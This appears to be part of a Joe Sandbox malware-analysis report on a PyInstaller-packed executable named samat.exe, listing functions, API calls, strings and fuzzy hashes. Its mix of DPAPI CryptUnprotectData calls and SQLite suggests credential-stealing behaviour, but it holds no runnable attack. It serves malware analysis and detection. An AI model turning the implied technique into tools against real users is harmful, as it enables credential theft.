csm, xrefs: 00007FF7E12CFDC6

Memory Dump Source

Source File: 00000007.00000002.4592535190.00007FF7E12C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7E12C0000, based on PE: true

Associated: 00000007.00000002.4592472245.00007FF7E12C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.4592605136.00007FF7E12EB000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.4592668306.00007FF7E12FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.4592668306.00007FF7E1302000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.4592786986.00007FF7E1304000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff7e12c0000_samat.jbxd

Similarity

API ID: ExceptionFileHeaderRaise
String ID: csm
API String ID: 2573137834-1018135373
Opcode ID: b596af9f6a60738c50b353da5cbad86497326ffe12a5eabfdc94c01c9dae4a3e
Instruction ID: 1863c94761d3cd37f162583b0d1044e7a7f6754c115aebc7d930312b3f650e75
Opcode Fuzzy Hash: b596af9f6a60738c50b353da5cbad86497326ffe12a5eabfdc94c01c9dae4a3e
Instruction Fuzzy Hash: D2115E32608B8182EB219F15E840399B7E8FB88B84F584232DB8D07754DF7CC551C700

Function 00007FF7E12E073C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 36COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF7E12E076C
GetDriveTypeW.KERNEL32 ref: 00007FF7E12E07AC

Strings

:, xrefs: 00007FF7E12E0795

Memory Dump Source

Source File: 00000007.00000002.4592535190.00007FF7E12C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7E12C0000, based on PE: true

Associated: 00000007.00000002.4592472245.00007FF7E12C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.4592605136.00007FF7E12EB000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.4592668306.00007FF7E12FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.4592668306.00007FF7E1302000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.4592786986.00007FF7E1304000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff7e12c0000_samat.jbxd

Similarity

API ID: DriveType_invalid_parameter_noinfo
String ID: :
API String ID: 2595371189-336475711
Opcode ID: 68237dfdc7112287ec82a3b365f776b5c9f6f856de5878160eaa1a8f91e0357f
Instruction ID: bb244cd4ccd4689cf73846cbc48848b3004b054a83a1bceda0c2ca526cca3462
Opcode Fuzzy Hash: 68237dfdc7112287ec82a3b365f776b5c9f6f856de5878160eaa1a8f91e0357f
Instruction Fuzzy Hash: 0701D422B1C20386F725BF60982337EA3A4EF48344FC44037D94D86681DEBCE5018B2A

Analysis Process: samat.exePID: 6120, Parent PID: 5228COMMON

Execution Graph

Execution Coverage:	2.5%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	3.9%
Total number of Nodes:	1244
Total number of Limit Nodes:	83

Executed Functions

Function 00007FF7E12C1000 Relevance: 61.8, APIs: 7, Strings: 28, Instructions: 511
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

MEI, xrefs: 00007FF7E12C3933
_PYI_SPLASH_IPC, xrefs: 00007FF7E12C3A23, 00007FF7E12C3EF5
_PYI_PARENT_PROCESS_LEVEL, xrefs: 00007FF7E12C3A17, 00007FF7E12C3A2F, 00007FF7E12C3A9B
_PYI_ARCHIVE_FILE, xrefs: 00007FF7E12C38D2, 00007FF7E12C39FF
Failed to convert DLL search path!, xrefs: 00007FF7E12C3DDC
VCRUNTIME140.dll, xrefs: 00007FF7E12C3DB1
_PYI_APPLICATION_HOME_DIR, xrefs: 00007FF7E12C3A0B, 00007FF7E12C3CD4, 00007FF7E12C3F6B
Failed to initialize security descriptor for temporary directory!, xrefs: 00007FF7E12C3C61
_PYI_APPLICATION_HOME_DIR not set for onefile child process!, xrefs: 00007FF7E12C3D35
Path exceeds PYI_PATH_MAX limit., xrefs: 00007FF7E12C3D12
pyi-disable-windowed-traceback, xrefs: 00007FF7E12C3BB2
Py_GIL_DISABLED, xrefs: 00007FF7E12C3AF4
pyi-contents-directory, xrefs: 00007FF7E12C3B8D
Could not load PyInstaller's embedded PKG archive from the executable (%s), xrefs: 00007FF7E12C3971
pyi-python-flag, xrefs: 00007FF7E12C3AD6
pkg, xrefs: 00007FF7E12C39BE
Failed to remove temporary directory: %s, xrefs: 00007FF7E12C3FCF
PYINSTALLER_SUPPRESS_SPLASH_SCREEN, xrefs: 00007FF7E12C3E0A
PYINSTALLER_RESET_ENVIRONMENT, xrefs: 00007FF7E12C3882, 00007FF7E12C38AF
Could not create temporary directory!, xrefs: 00007FF7E12C3CBF
Failed to start splash screen!, xrefs: 00007FF7E12C3ED4
Failed to load splash screen resources!, xrefs: 00007FF7E12C3E85
Failed to load Tcl/Tk shared libraries for splash screen!, xrefs: 00007FF7E12C3EBB
pyi-runtime-tmpdir, xrefs: 00007FF7E12C3B68
Invalid value in _PYI_PARENT_PROCESS_LEVEL: %s, xrefs: 00007FF7E12C3B32
Could not side-load PyInstaller's PKG archive from external file (%s), xrefs: 00007FF7E12C39DE
PYINSTALLER_STRICT_UNPACK_MODE, xrefs: 00007FF7E12C3BE8
Failed to unpack splash screen dependencies from PKG archive!, xrefs: 00007FF7E12C3EA6

Memory Dump Source

Source File: 00000008.00000002.4567233837.00007FF7E12C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7E12C0000, based on PE: true

Associated: 00000008.00000002.4567173824.00007FF7E12C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.4567302144.00007FF7E12EB000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.4567366785.00007FF7E12FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.4567366785.00007FF7E1301000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.4567491108.00007FF7E1304000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff7e12c0000_samat.jbxd

Similarity

API ID: ErrorFileLastModuleName
String ID: Could not create temporary directory!$Could not load PyInstaller's embedded PKG archive from the executable (%s)$Could not side-load PyInstaller's PKG archive from external file (%s)$Failed to convert DLL search path!$Failed to initialize security descriptor for temporary directory!$Failed to load Tcl/Tk shared libraries for splash screen!$Failed to load splash screen resources!$Failed to remove temporary directory: %s$Failed to start splash screen!$Failed to unpack splash screen dependencies from PKG archive!$Invalid value in _PYI_PARENT_PROCESS_LEVEL: %s$MEI$PYINSTALLER_RESET_ENVIRONMENT$PYINSTALLER_STRICT_UNPACK_MODE$PYINSTALLER_SUPPRESS_SPLASH_SCREEN$Path exceeds PYI_PATH_MAX limit.$Py_GIL_DISABLED$VCRUNTIME140.dll$_PYI_APPLICATION_HOME_DIR$_PYI_APPLICATION_HOME_DIR not set for onefile child process!$_PYI_ARCHIVE_FILE$_PYI_PARENT_PROCESS_LEVEL$_PYI_SPLASH_IPC$pkg$pyi-contents-directory$pyi-disable-windowed-traceback$pyi-python-flag$pyi-runtime-tmpdir
API String ID: 2776309574-4232158417
Opcode ID: d52c1960cc45de78c26c9f57622ace5a14626686e839aa839f1fc42fe00fc1f1
Instruction ID: 4d2c99a9177edecaaa5b682b82325fcd493c8c40b473d9cd541dac168e12def1
Opcode Fuzzy Hash: d52c1960cc45de78c26c9f57622ace5a14626686e839aa839f1fc42fe00fc1f1
Instruction Fuzzy Hash: 5D325C21B0868291FB19F725DC563F9A669AF44780FC48433DB5D822D6EFBCE558C322

Function 00007FF8B834CD30 Relevance: 61.4, APIs: 34, Strings: 1, Instructions: 182
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CRYPTO_free.LIBCRYPTO-3 ref: 00007FF8B834CD94
CRYPTO_free.LIBCRYPTO-3 ref: 00007FF8B834CDB6
CRYPTO_free_ex_data.LIBCRYPTO-3 ref: 00007FF8B834CDE8
OPENSSL_LH_free.LIBCRYPTO-3 ref: 00007FF8B834CDF1
X509_STORE_free.LIBCRYPTO-3 ref: 00007FF8B834CDFA
CTLOG_STORE_free.LIBCRYPTO-3 ref: 00007FF8B834CE06
OPENSSL_sk_free.LIBCRYPTO-3 ref: 00007FF8B834CE0F
OPENSSL_sk_free.LIBCRYPTO-3 ref: 00007FF8B834CE18
OPENSSL_sk_free.LIBCRYPTO-3 ref: 00007FF8B834CE21
OPENSSL_sk_pop_free.LIBCRYPTO-3 ref: 00007FF8B834CE40
OPENSSL_sk_pop_free.LIBCRYPTO-3 ref: 00007FF8B834CE53
OPENSSL_sk_pop_free.LIBCRYPTO-3 ref: 00007FF8B834CE66
OPENSSL_sk_free.LIBCRYPTO-3 ref: 00007FF8B834CE79
CRYPTO_free.LIBCRYPTO-3 ref: 00007FF8B834CEA6
CRYPTO_free.LIBCRYPTO-3 ref: 00007FF8B834CEBF
CRYPTO_free.LIBCRYPTO-3 ref: 00007FF8B834CED8
CRYPTO_free.LIBCRYPTO-3 ref: 00007FF8B834CEF1
CRYPTO_secure_free.LIBCRYPTO-3 ref: 00007FF8B834CF0A
EVP_MD_get0_provider.LIBCRYPTO-3 ref: 00007FF8B834CF1E
EVP_MD_free.LIBCRYPTO-3 ref: 00007FF8B834CF2B
EVP_MD_get0_provider.LIBCRYPTO-3 ref: 00007FF8B834CF3F
EVP_MD_free.LIBCRYPTO-3 ref: 00007FF8B834CF4C
EVP_CIPHER_get0_provider.LIBCRYPTO-3 ref: 00007FF8B834CF6B
EVP_CIPHER_free.LIBCRYPTO-3 ref: 00007FF8B834CF78
EVP_MD_get0_provider.LIBCRYPTO-3 ref: 00007FF8B834CF9F
EVP_MD_free.LIBCRYPTO-3 ref: 00007FF8B834CFAC
CRYPTO_free.LIBCRYPTO-3 ref: 00007FF8B834CFE9
CRYPTO_free.LIBCRYPTO-3 ref: 00007FF8B834D007
CRYPTO_free.LIBCRYPTO-3 ref: 00007FF8B834D025
CRYPTO_free.LIBCRYPTO-3 ref: 00007FF8B834D04E
CRYPTO_free.LIBCRYPTO-3 ref: 00007FF8B834D067
CRYPTO_THREAD_lock_free.LIBCRYPTO-3 ref: 00007FF8B834D073
CRYPTO_free.LIBCRYPTO-3 ref: 00007FF8B834D08C
CRYPTO_free.LIBCRYPTO-3 ref: 00007FF8B834D0A1

Strings

..\s\ssl\ssl_lib.c, xrefs: 00007FF8B834CD87, 00007FF8B834CDA0, 00007FF8B834CE99, 00007FF8B834CEB2, 00007FF8B834CECB, 00007FF8B834CEE4, 00007FF8B834CEFD, 00007FF8B834CFD8, 00007FF8B834CFF5, 00007FF8B834D013, 00007FF8B834D041, 00007FF8B834D05A, 00007FF8B834D07F, 00007FF8B834D097

Memory Dump Source

Source File: 00000008.00000002.4575154004.00007FF8B8331000.00000020.00000001.01000000.00000019.sdmp, Offset: 00007FF8B8330000, based on PE: true

Associated: 00000008.00000002.4575093919.00007FF8B8330000.00000002.00000001.01000000.00000019.sdmpDownload File
Associated: 00000008.00000002.4575154004.00007FF8B83B3000.00000020.00000001.01000000.00000019.sdmpDownload File
Associated: 00000008.00000002.4575346345.00007FF8B83B5000.00000002.00000001.01000000.00000019.sdmpDownload File
Associated: 00000008.00000002.4575421069.00007FF8B83DD000.00000004.00000001.01000000.00000019.sdmpDownload File
Associated: 00000008.00000002.4575482398.00007FF8B83E2000.00000002.00000001.01000000.00000019.sdmpDownload File
Associated: 00000008.00000002.4575482398.00007FF8B83E8000.00000002.00000001.01000000.00000019.sdmpDownload File
Associated: 00000008.00000002.4575482398.00007FF8B83F0000.00000002.00000001.01000000.00000019.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff8b8330000_samat.jbxd

Similarity

API ID: O_free$L_sk_free$D_freeD_get0_providerL_sk_pop_free$E_free$D_lock_freeH_freeO_free_ex_dataO_secure_freeR_freeR_get0_providerX509_
String ID: ..\s\ssl\ssl_lib.c
API String ID: 234229340-1080266419
Opcode ID: f7e90b002c0f20001dbf9e5a2de404a379799662cee41334dc9c8a45caab9bf3
Instruction ID: 239cb4180f08cf854ea9059c765fcd7dcca6b7dc5a372dfc0957df3d32ad00c6
Opcode Fuzzy Hash: f7e90b002c0f20001dbf9e5a2de404a379799662cee41334dc9c8a45caab9bf3
Instruction Fuzzy Hash: E5912F25A1964280FB54AF2AD9512FD2721EF89BC8F4C5032EF1D0B69ACF3DE1478718

Function 00007FF8B7E8DE80 Relevance: 47.4, APIs: 16, Strings: 11, Instructions: 106
libraryloadermemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNEL32 ref: 00007FF8B7E8DE93
LoadLibraryW.KERNEL32 ref: 00007FF8B7E8DEA8
GetProcAddress.KERNEL32 ref: 00007FF8B7E8DEC4
GetProcAddress.KERNEL32 ref: 00007FF8B7E8DEE9
GetProcAddress.KERNEL32 ref: 00007FF8B7E8DF0E
GetProcAddress.KERNEL32 ref: 00007FF8B7E8DF33
GetProcAddress.KERNEL32 ref: 00007FF8B7E8DF58
GetProcAddress.KERNEL32 ref: 00007FF8B7E8DF7D
GetProcAddress.KERNEL32 ref: 00007FF8B7E8DFA2
GetProcAddress.KERNEL32 ref: 00007FF8B7E8DFC7
GetProcAddress.KERNEL32 ref: 00007FF8B7E8DFEC
GetProcAddress.KERNEL32 ref: 00007FF8B7E8E011
InitializeCriticalSection.KERNEL32 ref: 00007FF8B7E8E03C
TlsAlloc.KERNEL32 ref: 00007FF8B7E8E042
DeleteCriticalSection.KERNEL32 ref: 00007FF8B7E8E062
TlsFree.KERNEL32 ref: 00007FF8B7E8E06E

Strings

AddAccessDeniedAceEx, xrefs: 00007FF8B7E8DF65
SetSecurityDescriptorControl, xrefs: 00007FF8B7E8DFF9
AddAccessDeniedAce, xrefs: 00007FF8B7E8DED1
AddAuditAccessAceEx, xrefs: 00007FF8B7E8DFAF
AdvAPI32.dll, xrefs: 00007FF8B7E8DE8A, 00007FF8B7E8DEA1
AddAccessAllowedAce, xrefs: 00007FF8B7E8DEBA
AddMandatoryAce, xrefs: 00007FF8B7E8DF1B
AddAccessAllowedAceEx, xrefs: 00007FF8B7E8DEF6
AddAuditAccessObjectAce, xrefs: 00007FF8B7E8DFD4
AddAccessDeniedObjectAce, xrefs: 00007FF8B7E8DF8A
AddAccessAllowedObjectAce, xrefs: 00007FF8B7E8DF40

Memory Dump Source

Source File: 00000008.00000002.4572356980.00007FF8B7E81000.00000020.00000001.01000000.00000032.sdmp, Offset: 00007FF8B7E80000, based on PE: true

Associated: 00000008.00000002.4572293871.00007FF8B7E80000.00000002.00000001.01000000.00000032.sdmpDownload File
Associated: 00000008.00000002.4572423231.00007FF8B7E91000.00000002.00000001.01000000.00000032.sdmpDownload File
Associated: 00000008.00000002.4572488323.00007FF8B7E9F000.00000004.00000001.01000000.00000032.sdmpDownload File
Associated: 00000008.00000002.4572551150.00007FF8B7EA2000.00000002.00000001.01000000.00000032.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff8b7e80000_samat.jbxd

Similarity

API ID: AddressProc$CriticalSection$AllocDeleteFreeHandleInitializeLibraryLoadModule
String ID: AddAccessAllowedAce$AddAccessAllowedAceEx$AddAccessAllowedObjectAce$AddAccessDeniedAce$AddAccessDeniedAceEx$AddAccessDeniedObjectAce$AddAuditAccessAceEx$AddAuditAccessObjectAce$AddMandatoryAce$AdvAPI32.dll$SetSecurityDescriptorControl
API String ID: 3842108915-2689366622
Opcode ID: 57473d222362ce1a73b4be061c9170d604a9f0b2407b316df202a6e5a26e742f
Instruction ID: affb4b7eb79b53683e5c4793fdb59da8d4ead73fa312edda18f0f67200fc5d1c
Opcode Fuzzy Hash: 57473d222362ce1a73b4be061c9170d604a9f0b2407b316df202a6e5a26e742f
Instruction Fuzzy Hash: E3513326A49B0AA5EF49DB5EFC9417833A4AF88FD5F44503AEA0E43374EF3CA5548300

Function 00007FF8B8047350 Relevance: 37.2, APIs: 4, Strings: 20, Instructions: 1177COMMON

Download Yara Rule

Strings

sqlite_, xrefs: 00007FF8B8047620
there is already a table named %s, xrefs: 00007FF8B8047850
views may not be indexed, xrefs: 00007FF8B804770D
sqlite_autoindex_%s_%d, xrefs: 00007FF8B804791F
CREATE%s INDEX %.*s, xrefs: 00007FF8B8048337
INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);, xrefs: 00007FF8B804835C
invalid rootpage, xrefs: 00007FF8B804823A
too many columns in %s, xrefs: 00007FF8B8047AD2
cannot create a TEMP index on non-TEMP table "%s", xrefs: 00007FF8B80475BA
virtual tables may not be indexed, xrefs: 00007FF8B804772B
name='%q' AND type='index', xrefs: 00007FF8B80483C9
sqlite_temp_master, xrefs: 00007FF8B804796C
BINARY, xrefs: 00007FF8B8047C63, 00007FF8B8047E11, 00007FF8B8047EF9
conflicting ON CONFLICT clauses specified, xrefs: 00007FF8B80481DA
table %s may not be indexed, xrefs: 00007FF8B8047694
expressions prohibited in PRIMARY KEY and UNIQUE constraints, xrefs: 00007FF8B8047E7D
index, xrefs: 00007FF8B80474C8, 00007FF8B8047800, 00007FF8B8047AC8
UNIQUE, xrefs: 00007FF8B8048308
index %s already exists, xrefs: 00007FF8B8047892
sqlite_master, xrefs: 00007FF8B8047961

Memory Dump Source

Source File: 00000008.00000002.4573442954.00007FF8B7FE1000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF8B7FE0000, based on PE: true

Associated: 00000008.00000002.4573369201.00007FF8B7FE0000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000008.00000002.4573616995.00007FF8B8114000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000008.00000002.4573730405.00007FF8B8143000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000008.00000002.4573844736.00007FF8B8148000.00000002.00000001.01000000.0000001B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff8b7fe0000_samat.jbxd

Similarity

API ID:
String ID: UNIQUE$BINARY$CREATE%s INDEX %.*s$INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);$cannot create a TEMP index on non-TEMP table "%s"$conflicting ON CONFLICT clauses specified$expressions prohibited in PRIMARY KEY and UNIQUE constraints$index$index %s already exists$invalid rootpage$name='%q' AND type='index'$sqlite_$sqlite_autoindex_%s_%d$sqlite_master$sqlite_temp_master$table %s may not be indexed$there is already a table named %s$too many columns in %s$views may not be indexed$virtual tables may not be indexed
API String ID: 0-4172737255
Opcode ID: e6aaa302de3afdb3e955935eef4223feae12bb8825ca52dee905d1f93797de2c
Instruction ID: 0557aa0ef7ad5045435b36ea909e3d71605b0951778e058fdf16404d926853b2
Opcode Fuzzy Hash: e6aaa302de3afdb3e955935eef4223feae12bb8825ca52dee905d1f93797de2c
Instruction Fuzzy Hash: 67B2BA62A49B9686EF608B2A94406BA27B1FB89BC4F484536DF4D077D5DF3CE853C304

Function 00007FF8B7EB9710 Relevance: 36.9, APIs: 18, Strings: 3, Instructions: 144
threadencryptionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PyArg_ParseTupleAndKeywords.PYTHON313 ref: 00007FF8B7EB9787
PyErr_SetString.PYTHON313 ref: 00007FF8B7EB97B0
??0PyWinBufferView@@QEAA@PEAU_object@@_N1@Z.PYWINTYPES313 ref: 00007FF8B7EB97EF
??1PyWinBufferView@@QEAA@XZ.PYWINTYPES313 ref: 00007FF8B7EB97FF
??1PyWinBufferView@@QEAA@XZ.PYWINTYPES313 ref: 00007FF8B7EB9815
??0PyWinBufferView@@QEAA@PEAU_object@@_N1@Z.PYWINTYPES313 ref: 00007FF8B7EB9836
??1PyWinBufferView@@QEAA@XZ.PYWINTYPES313 ref: 00007FF8B7EB9854
PyEval_SaveThread.PYTHON313 ref: 00007FF8B7EB98A1
CryptUnprotectData.CRYPT32 ref: 00007FF8B7EB98CF
PyEval_RestoreThread.PYTHON313 ref: 00007FF8B7EB98DA
?PyWin_SetAPIError@@YAPEAU_object@@PEADJ@Z.PYWINTYPES313 ref: 00007FF8B7EB98F5
?PyWinObject_FreeWCHAR@@YAXPEA_W@Z.PYWINTYPES313 ref: 00007FF8B7EB98FF
PyBytes_FromStringAndSize.PYTHON313 ref: 00007FF8B7EB9916
?PyWinObject_FromOLECHAR@@YAPEAU_object@@PEB_W@Z.PYWINTYPES313 ref: 00007FF8B7EB9924
Py_BuildValue.PYTHON313 ref: 00007FF8B7EB9937
LocalFree.KERNEL32 ref: 00007FF8B7EB994A
LocalFree.KERNEL32 ref: 00007FF8B7EB9955
?PyWinObject_FreeWCHAR@@YAXPEA_W@Z.PYWINTYPES313 ref: 00007FF8B7EB995F

Strings

O|OOOk:CryptUnprotectData, xrefs: 00007FF8B7EB9740
Reserved must be None, xrefs: 00007FF8B7EB97A6
CryptUnprotectData, xrefs: 00007FF8B7EB98EE

Memory Dump Source

Source File: 00000008.00000002.4572680567.00007FF8B7EB1000.00000020.00000001.01000000.00000031.sdmp, Offset: 00007FF8B7EB0000, based on PE: true

Associated: 00000008.00000002.4572618132.00007FF8B7EB0000.00000002.00000001.01000000.00000031.sdmpDownload File
Associated: 00000008.00000002.4572761166.00007FF8B7EC2000.00000002.00000001.01000000.00000031.sdmpDownload File
Associated: 00000008.00000002.4572831046.00007FF8B7ECC000.00000004.00000001.01000000.00000031.sdmpDownload File
Associated: 00000008.00000002.4572895965.00007FF8B7ECF000.00000002.00000001.01000000.00000031.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff8b7eb0000_samat.jbxd

Similarity

API ID: BufferView@@$Free$Object_$Eval_FromLocalStringThreadU_object@@U_object@@_$Arg_BuildBytes_CryptDataErr_Error@@KeywordsParseRestoreSaveSizeTupleUnprotectValueWin_
String ID: CryptUnprotectData$O|OOOk:CryptUnprotectData$Reserved must be None
API String ID: 674621842-630361847
Opcode ID: 8571ba1da2a79e8f39c947d7549dfd2b965916f8899a278ea0dab190675a46f9
Instruction ID: 922b6e281b994e42bb31dd89bca0a4dcd704c2455d8aa214602eab756872821c
Opcode Fuzzy Hash: 8571ba1da2a79e8f39c947d7549dfd2b965916f8899a278ea0dab190675a46f9
Instruction Fuzzy Hash: E271E53AA08B5286EB108B79E8901AD77A5FF88B94F140136DB4D53B68DF3CE589C700

Function 00007FF8B7FF92B0 Relevance: 14.0, APIs: 6, Strings: 3, Instructions: 513
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

memcpy.VCRUNTIME140 ref: 00007FF8B7FF937F
memset.VCRUNTIME140 ref: 00007FF8B7FF93F7
memcpy.VCRUNTIME140 ref: 00007FF8B7FF945E
memcpy.VCRUNTIME140 ref: 00007FF8B7FF9480
memcpy.VCRUNTIME140 ref: 00007FF8B7FF963E
memcpy.VCRUNTIME140 ref: 00007FF8B7FF9667

Strings

nolock, xrefs: 00007FF8B7FF97C5
immutable, xrefs: 00007FF8B7FF97FD
-journal, xrefs: 00007FF8B7FF9646

Memory Dump Source

Source File: 00000008.00000002.4573442954.00007FF8B7FE1000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF8B7FE0000, based on PE: true

Associated: 00000008.00000002.4573369201.00007FF8B7FE0000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000008.00000002.4573616995.00007FF8B8114000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000008.00000002.4573730405.00007FF8B8143000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000008.00000002.4573844736.00007FF8B8148000.00000002.00000001.01000000.0000001B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff8b7fe0000_samat.jbxd

Similarity

API ID: memcpy$memset
String ID: -journal$immutable$nolock
API String ID: 438689982-4201244970
Opcode ID: 74c394c9142b35d2fd43c5d798de1803b6b601682fd161d5b0baee638d432f90
Instruction ID: e8da34741091c5b1fa3f16056bc04c58d2a965ea4232870dd7344904ec9731d9
Opcode Fuzzy Hash: 74c394c9142b35d2fd43c5d798de1803b6b601682fd161d5b0baee638d432f90
Instruction Fuzzy Hash: 63329A22A0A78286EB25DF29945037937A1FB45BE5F084234CB6E4B7E4DF3CE456C708

Function 00007FF7E12E6964 Relevance: 13.8, APIs: 9, Instructions: 276
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF7E12E6698: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7E12E66D9
Part of subcall function 00007FF7E12E6698: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7E12E6757
Part of subcall function 00007FF7E12E6698: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7E12E67A8

CreateFileW.KERNEL32 ref: 00007FF7E12E6A6A
CreateFileW.KERNEL32 ref: 00007FF7E12E6ABA
GetLastError.KERNEL32 ref: 00007FF7E12E6AEA
GetFileType.KERNEL32 ref: 00007FF7E12E6AFF
GetLastError.KERNEL32 ref: 00007FF7E12E6B09
CloseHandle.KERNEL32 ref: 00007FF7E12E6B3C
CloseHandle.KERNEL32 ref: 00007FF7E12E6C9F
CreateFileW.KERNEL32 ref: 00007FF7E12E6CD4
GetLastError.KERNEL32 ref: 00007FF7E12E6CE3

Memory Dump Source

Source File: 00000008.00000002.4567233837.00007FF7E12C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7E12C0000, based on PE: true

Associated: 00000008.00000002.4567173824.00007FF7E12C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.4567302144.00007FF7E12EB000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.4567366785.00007FF7E12FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.4567366785.00007FF7E1301000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.4567491108.00007FF7E1304000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff7e12c0000_samat.jbxd

Similarity

API ID: File$CreateErrorLast_invalid_parameter_noinfo$CloseHandle$Type
String ID:
API String ID: 1617910340-0
Opcode ID: baaa1bd2bfcf3e8d87424e6061cd652f961a4b3dae6ad7eaae94581ee29caa63
Instruction ID: fa1b00118abf8c3beb5864411022a9176577bd252dcd7c31b3930ecdedd5bb51
Opcode Fuzzy Hash: baaa1bd2bfcf3e8d87424e6061cd652f961a4b3dae6ad7eaae94581ee29caa63
Instruction Fuzzy Hash: 79C1F333B28A4285EB11DFA5C8823AC7765F749B98F81423ADE2E97794CF79E051C311

Function 00007FF8B805CF30 Relevance: 12.4, APIs: 1, Strings: 7, Instructions: 441COMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140 ref: 00007FF8B805D5A7

Strings

API call with %s database connection pointer, xrefs: 00007FF8B805CF84
8653b758870e6ef0c98d46b3ace27849054af85da891eb121e9aaa537f1e8355, xrefs: 00007FF8B805CF95
NULL, xrefs: 00007FF8B805CF5D
unopened, xrefs: 00007FF8B805CF7D
invalid, xrefs: 00007FF8B805CF72
%s at line %d of [%.10s], xrefs: 00007FF8B805CFAE
misuse, xrefs: 00007FF8B805CFA2

Memory Dump Source

Source File: 00000008.00000002.4573442954.00007FF8B7FE1000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF8B7FE0000, based on PE: true

Associated: 00000008.00000002.4573369201.00007FF8B7FE0000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000008.00000002.4573616995.00007FF8B8114000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000008.00000002.4573730405.00007FF8B8143000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000008.00000002.4573844736.00007FF8B8148000.00000002.00000001.01000000.0000001B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff8b7fe0000_samat.jbxd

Similarity

API ID: memcpy
String ID: %s at line %d of [%.10s]$8653b758870e6ef0c98d46b3ace27849054af85da891eb121e9aaa537f1e8355$API call with %s database connection pointer$NULL$invalid$misuse$unopened
API String ID: 3510742995-509082904
Opcode ID: de9d8daf37c74b9081c646134e786b93087933e5578fbc028138b62138ad8e81
Instruction ID: 4012b45fc4db8def1d3318595fc5387ae4534306cb52ffd80f5ad704c05b1452
Opcode Fuzzy Hash: de9d8daf37c74b9081c646134e786b93087933e5578fbc028138b62138ad8e81
Instruction Fuzzy Hash: D8126C62A0AA4685EF549F29E4903B967A1FB44BC8F584036DF5E077D4DF3CE4438728

Function 00007FF8B8064C70 Relevance: 9.4, APIs: 3, Strings: 3, Instructions: 370COMMON

Download Yara Rule

APIs

memset.VCRUNTIME140 ref: 00007FF8B8064CDF
memcpy.VCRUNTIME140 ref: 00007FF8B8064EFD
memcpy.VCRUNTIME140 ref: 00007FF8B8064FAE

Strings

database schema is locked: %s, xrefs: 00007FF8B8064E56
out of memory, xrefs: 00007FF8B8064D5F
statement too long, xrefs: 00007FF8B8064EB3

Memory Dump Source

Source File: 00000008.00000002.4573442954.00007FF8B7FE1000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF8B7FE0000, based on PE: true

Associated: 00000008.00000002.4573369201.00007FF8B7FE0000.00000002.00000001.01000000.0000001B.sdmpDownload File
